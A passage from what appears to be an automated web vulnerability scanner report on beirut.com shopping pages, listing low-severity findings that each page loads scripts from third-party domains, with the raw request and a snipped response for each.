Date: Tue, 25 Jan 2011 09:40:53 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62786

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.654. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hair-Wigs/73

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Hair-Wigs/73 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:10:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56197

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.655. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Hats/56

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Hats/56

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Hats/56 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:14:39 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61139

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.656. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Jewelry/23

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Jewelry/23

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Jewelry/23 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:54:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.657. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Leather-Goods/76

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Leather-Goods/76 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:58:50 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56268

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.658. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Shoes/26

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Shoes/26

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Shoes/26 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:53:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62232

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.659. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Swimwear/53

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Swimwear/53

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Swimwear/53 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:16:45 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62926

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.660. http://www.beirut.com/Shopping/Clothing-Accessories/194367784/Watches/36

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Clothing-Accessories/194367784/Watches/36

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Clothing-Accessories/194367784/Watches/36 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 09:48:19 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 62165

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.661. http://www.beirut.com/Shopping/Consumer-Goods/235690923

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:58:52 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61870

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.662. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Flowers/17

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Flowers/17

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Flowers/17 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:03:51 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61300

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.663. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Health-Products/77

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Health-Products/77

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Health-Products/77 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:15:48 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57865

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.664. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Liquor-Store/70

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Liquor-Store/70

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Liquor-Store/70 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:21:34 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56374

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<div id="user" style="padding-top:8px;">
<script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
<script src="http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php" type="text/javascript"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...
</script>
                                           <script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#username=beirutcom"></script>
...[SNIP]...
</iframe>
<script type='text/javascript' src='http://d1.openx.org/ag.php'></script>
...[SNIP]...

21.665. http://www.beirut.com/Shopping/Consumer-Goods/235690923/Luggage/41

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Consumer-Goods/235690923/Luggage/41

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://d1.openx.org/ag.php
  • http://s7.addthis.com/js/250/addthis_widget.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://static.new.facebook.com/js/api_lib/v0.4/FeatureLoader.js.php

Request

GET /Shopping/Consumer-Goods/235690923/Luggage/41 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 10:39:14 GMT
Server: Apache/2.2.3 (CentOS)
